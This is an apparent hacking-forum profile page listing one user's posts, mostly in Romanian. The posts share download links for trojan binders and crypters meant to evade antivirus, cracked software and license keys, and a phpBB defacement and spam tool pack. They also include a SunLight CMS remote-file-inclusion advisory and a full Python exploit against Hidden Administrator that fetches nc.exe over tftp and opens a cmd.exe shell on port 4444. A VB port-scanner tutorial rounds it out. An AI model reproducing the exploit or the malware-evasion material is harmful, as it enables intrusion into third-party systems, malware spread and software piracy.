Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. Pretator v1.6 by oHawko THE PRETATOR BINDER VERSION 1.6 The Pretator Version 1.6 Features / News: - Few Bug fixed - Icon Stealer included - GUI Changes - Stub Size 21 KB Unpacked (packable / packed 8 KB) - This is a "in between" Version since v2.0 isnt totaly finished yet! So stay tuned for Pretator Version 2.0. Download: http://rapidshare.com/files/32528311/Pretator_v1.6.rar
  2. Ras

    Poze cu "XSS"

    iti dau eu adresa daca vrei
  3. Ras

    Poze cu "XSS"

    poza e mai de mult numai ca nu gaseam kit-ul de instalare de la telefon
  4. Ras

    Esti Fumator?

    nu fumez si nici nu am sa fumez vreodata bleahh...
  5. Ras

    Poze cu "XSS"

    am motorola v980
  6. am rezistat decat 12 minute la ala cu extasy e misto asa numai ca trebe sa rezisti ceva timp ca sa isi faca un efect
  7. Ras

    Poze cu "XSS"

    Pozele astea le-am facut in drum spre scoala cu telefonu meu! Ce pareri aveti ?
  8. Glary Utilities is a collection of system tools and utilities to fix, speed up, maintain and protect your PC. It allows you to clean common system junk files, as well as invalid registry entries and Internet traces (theres a plug-in support for 45+ external programs). You can also manage and delete browser add-ons, analyze disk space usage and find duplicate files. Furthermore, Glary Utilities includes the options to optimize memory, find, fix, or remove broken Windows shortcuts, manage the programs that start at Windows startup and uninstall software. Other features include secure file deletion, an Empty Folder finder and more. Other features include secure file deletion, an Empty Folder finder and more. All Glary Utilities tools can be accessed through an eye-pleasing and totally simplistic interface. Designed for Windows 98, Me, 2000, XP and Windows Vista. Features: -Disk Cleaner Removes junk data from your disks and recovers disk space -Registry Cleaner Scan and clean up your registry to improve your system's performance. -Shortcuts Fixer Corrects the errors in your startmenu & desktop shortcuts -Startup Manager Manages programs which run automatically on startup -Memory Optimizer Monitors and optimizes free memory in the background -Tracks Eraser Erases all the traces,evidences,cookies,internet history and more -File Shredder Erases files permanently so that no one can recover them -Internet Explorer Assistant Manages Internet Explorer Add-ons and restores hijacked settings -Disk Analysis Get details information of the desired files and folders -Duplicate Files Finder Searchs for space-wasting and error producing duplicate files -Empty Folders Finder Find and remove empty folders in your windows -Uninstall Manager Completely uninstall programs you don't need any more -Context Menu Manager Manage the context-menu entries for files, folders... -Process Manager Monitor programs that run on your PC and stop spyware and Trojans. Version 2.0.1.7 adds new restoration features for Empty Folder finder and Shortcuts Fixer. Download: http://rapidshare.com/files/32357942/softarchiveGlary2017.rar
  9. tutorialul este vechi dar bun combinatia se face, dar nu ruleaza ambele fisiere in acelasi timp... daca ar fi pornit ambele fisiere deodata combinam un trojan cu o poza si gata daca combini un fisier .jpg cu un fisier .exe si il salvezi cu extensia .jpg poza porneste dar daca vrei sa porneasca si fisierul .exe trebuie sa ii schimbi extensia in .exe acelui fisier.
  10. daca ai stii cat am cautat aol 8... gaseam numai aol 9 multumesc mult... chiar aveam nevoie
  11. NOD32 Antivirus v2.70.39 Retail Download Retail Program (Not Trial) KeyCodes & NOD32fix v2.2 & Username-Pass AutoFinder Installs Automatically The Latest Retail User Pass Info For 2000/2003/NT/XP/ Vista (32&64) NOD32 Antivirus System provides well balanced, state-of-the-art protection against threats endangering your PC and enterprise systems running various platforms from Microsoft Windows NT / 2000 / 2003 / XP / Vista, through a number of UNIX/Linux, Novell, MS DOS operating systems to Microsoft Exchange Server, Lotus Domino and other mail servers. Trojans, viruses, worms and other malware using NOD32 are kept out of striking distance of your valuable data. Advanced detection methods implemented in the software even provide protection against the future threats from most of the new worms and viruses. The fourth generation of the NOD32 Antivirus System features a fully integrated software suite characterized by an unprecedented detection track record, the fastest scanning rates and extremely low utilization of system resources. NOD32's detection efficiency combined with 2-50 times faster hard disk scanning rate earned the product many international prestigious awards. NOD32 is the world leader of the Virus Bulletin 100% Awards having won more awards (21) than any competing product. Since its first submission for testing in May 1998, NOD32 was the only tested product that has never missed a single In the Wild virus. Here are some key features of "NOD":
  12. Download: http://rapidshare.com/files/32312064/Redbinder_v_2.0.1.rar
  13. ############################################################################################## #SunLight CMS 5.3 <= Remote File Inclusion Vulnerability # #Dork:""cms SunLight 5.2" # #Dork2:http://search.seznam.cz/searchScreen?w="cms+SunLight+5.2"&mod=f # #Vuln Code ############################################################################################## # #ERROR1:_connect.php # # /*-----vlozeni pristupovych dat-----*/ # include($root."_access.php"); <<< RFI CODE # # #BUG1: # #Example1:[url]http://site.com/path/_connect.php?root=[/url][[Sh3LL Script]] # #ERROR2:modules/startup.php # # include($root."_connect.php"); # include($root."modules/sessions.php"); # include($root."modules/content_preload.php"); <<< RFI CODE # # #BUG1: # #Example1:[url]http://site.com/path/modules/startup.php?root=[/url][[Sh3LL Script]] # #Script Download ############################################################################################## # #[url]http://sunlight.profitux.cz/upload/stahuj/system/sunlight_53_standard.zip[/url] # ############################################################################################## # #Cyber-Security # ##############################################################################################
  14. Aase Binder/Packer/Crypter by santasdad Language: delphi Description: bind as many files as you like make them all undetected run binded files in memory/ extract them to file run hidden/visible with parameters. server supports many parameters. choose output icon. save & reload projects. Download: http://rapidshare.com/files/32263540/aase.rar
  15. #################################################################################### # Hidden Administrator Authenticaiton Bypass Exploit # # ahmed[at]rewterz.com # # [url]http://www.securityfocus.com/bid/24049[/url] # # # # C:\>python rewt-ha-exp.py # # Usage: rewt-ha-exp.py -h <host ip> -p <port> -t <tftpd server ip> # # make sure nc.exe exists on tftpd server # # # # C:\>telnet 192.168.1.4 4444 # # C:\>python rewt-ha-exp.py -h 192.168.1.4 -p 3128 -t 192.168.1.105 # # [+] Connecting to 192.168.1.4 # # [+] Uploading Files # # [+] DONE [+] # # [+] Now Connect to port 4444 on victim IP !!! # # # # C:\>telnet 192.168.1.4 4444 # # Mcft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Mcft Corp. # # C:\ha_server> # #################################################################################### import socket import struct import time import sys import getopt def usage(): print "\n" print "######################################################" print "# Hidden Administrator Authentication Bypass Exploit #" print "# Coded By ahmed[at]rewterz.com #" print "######################################################" print "\n" print "Usage: %s -h <host ip> -p <port> -t <tftpd server ip>" % sys.argv[0] print "make sure nc.exe exists on tftpd server\n" def exploit(): h ="%X" % (130+len(tftpd)) buff1='_file_manager_operations_copy_files_Loc_Rem_c:\\^file\r\n\x0brewt_ha.bat' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' buff1 += ('\\x' + h).decode('string_escape') buff1 += '\x00\x00\x00\x00\x00\x00\x00' buff1+='\x00tftp -i ' + tftpd + ' GET nc.exe c:\\nc.exe ' buff1+='\r\nc:\\nc.exe -L -d -p 4444 -e cmd.exe \r\n\r\n ' buff1+=' \r\n\r\n_file_manager_operations_get_cur_dir_c:\r\n' try: print "[+] Connecting to %s" %host s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect((host,int(port))) print "[+] Uploading Files" s.send(buff1) time.sleep(2) s.send('+run_C:\\rewt_ha.bat|\r\n') time.sleep(1) print "[+] DONE [+]" print "[+] Now Connect to port 4444 on victim IP !!!" except: print "[+] Could not connect to the server" if len(sys.argv)<7: usage() sys.exit() try: options = getopt.getopt(sys.argv[1:], 'h:p:t:')[0] except getopt.GetoptError, err: print err usage() sys.exit() for option, value in options: if option == '-h': host = value if option == '-p': port = int(value) if option == '-t': tftpd=value exploit()
  16. nu ai pt ce... sunt usor de folosit... te descurci tu
  17. Need to learn Unix fast? Try a Visual QuickStart! This best-selling reference's visual format and step-by-step, task-based instructions will have you up and running with Unix software in no time. In this completely updated edition of our best-selling guide to Unix, Second Edition: Visual QuickStart Guide, leading software application experts Deborah S. Ray and Eric J. Ray use crystal-clear instructions and friendly prose to introduce you to Unix. Filled with step-by-step, task-based instructions and loads of visual aids, this book explains how to the most common Unix commands. Download: http://rapidshare.com/files/28515627/UNIX_Visual_Quickstart_By_Burimi007.rar
  18. Folder Security Personal is a simple but effective utility that makes it easy to to protect your files from prying eyes and overeager children. To work normally with protected files, start Folder Security Personal and enter the password. Download: http://rapidshare.com/files/32248512/secdirsetup.exe
  19. Trojan Remover aids in the removal of Malware - Trojan Horses, Worms, Adware, Spyware - when standard anti-virus software either fails to detect them or fails to effectively eliminate them. Standard antivirus programs are good at detecting this Malware, but not always good at effectively removing it. Trojan Remover is designed specifically to disable/remove Malware without the user having to manually edit system files or the Registry. The program also removes the additional system modifications some Malware carries out which are ignored by standard antivirus and trojan scanners. Screenshots [click on an image to enlarge it] What Trojan Remover Does Trojan Remover examines all the system files, the Windows Registry and the programs and files loaded at boot time. The majority of malicious programs (once triggered) load this way. Trojan Remover scans ALL the files loaded at boot time for Adware, Spyware, Remote Access Trojans, Internet Worms and other malware. Trojan Remover also checks to see if Windows loads Services which are hidden by Rootkit techniques and warns you if it finds any. For each identified Trojan Horse, Worm, or other malware, Trojan Remover pops up an alert screen which shows the file location and name; it offers to remove the program's reference from the system files and allows you to rename the file to stop its activation. Most modern Malware programs are memory-resident, which makes their de-activation more difficult. How many times have you been told to start your computer in 'Safe' mode, or even worse, in DOS? Trojan Remover does all this for you. When it finds Malware that is memory-resident, Trojan Remover automatically re-starts (on request) your system and completely DISABLES the Malware before Windows restarts. Trojan Remover writes a detailed logfile every time it performs a scan. This logfile contains information on which programs load at boot-time, and what (if any) actions Trojan Remover carried out. The logfile can be viewed and printed using Notepad. Trojan Remover is set to automatically scan for Malware every time you start your PC (you can disable this automatic scan if you wish). You can scan individual files and directories from within Windows Explorer. Trojan Remover incorporates an integral Updater allowing for quick and easy Database updates. Download: http://rapidshare.com/files/32247703/Trojan.Remover.6.6.0_I_Crack.rar
  20. Ras

    AntiDote v1.2

    poti sa stergi topic-ul ...
  21. Includes: + phpBB Annihilator + phpBB Defacer + UC Forum Spam + phpBB Extractor + phpBB Spammer + phpBB Attacker + Bonus: Collection of phpBB exploits Download: http://rapidshare.com/files/32245240/aio_phpbb2_tools.rar
  22. antidote 1.2 osce compress and scrambles servers and trojans in order to make them undetected. Download: http://rapidshare.com/files/32244567/AntiDote_v1.2_osCE.rar Password: osC++CoDeR
  23. Un binder. Download: http://rapidshare.com/files/32243837/TAOD.rar
  24. Intra in VB fa un proiect nou. Adauga Winsock Control (apesti CTRL + T si selectezi acolo). Creeaza 2 textboxes, 2 buttons, 1 timer, 1 listbox, 1 winsock Primul Textbox este pt IP, al doilea pt port, primul buton pt start, al doilea pt stop. Pune timerul False si pune intervalu 1. In primul buton scrii: Private Sub Command1_Click() Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect Timer1.Enabled = True End Sub In timer scrii: Private Sub Timer1_Timer() Winsock1.Close ' closes the last connection Text2.Text = Int(Text2.Text) + 1 Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect End Sub In winsock scrii: Private Sub Winsock1_Connect() List1.AddItem "Port " & Winsock1.RemotePort & " is having a yard sale." End Sub In al doilea buton scrii: Private Sub Command2_Click() Timer1.Enabled = False ' stops the scanning timer Winsock1.Close ' closes any open winsock connection that was still open. End Sub
  25. uitati cum se face un port scanner in maxim 5 min Intra in VB fa un proiect nou. Adauga Winsock Control (apesti CTRL + T si selectezi acolo). Creeaza 2 textboxes, 2 buttons, 1 timer, 1 listbox, 1 winsock Primul Textbox este pt IP, al doilea pt port, primul buton pt start, al doilea pt stop. Pune timerul False si pune intervalu 1. In primul buton scrii: Private Sub Command1_Click() Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect Timer1.Enabled = True End Sub In timer scrii: Private Sub Timer1_Timer() Winsock1.Close ' closes the last connection Text2.Text = Int(Text2.Text) + 1 Winsock1.RemoteHost = Text1.Text Winsock1.RemotePort = Text2.Text Winsock1.Connect End Sub In winsock scrii: Private Sub Winsock1_Connect() List1.AddItem "Port " & Winsock1.RemotePort & " is having a yard sale." End Sub In al doilea buton scrii: Private Sub Command2_Click() Timer1.Enabled = False ' stops the scanning timer Winsock1.Close ' closes any open winsock connection that was still open. End Sub Acest tutorial l-am gasit pe helbound hackers [sau cum e] si l-am tradus in romana
×
×
  • Create New...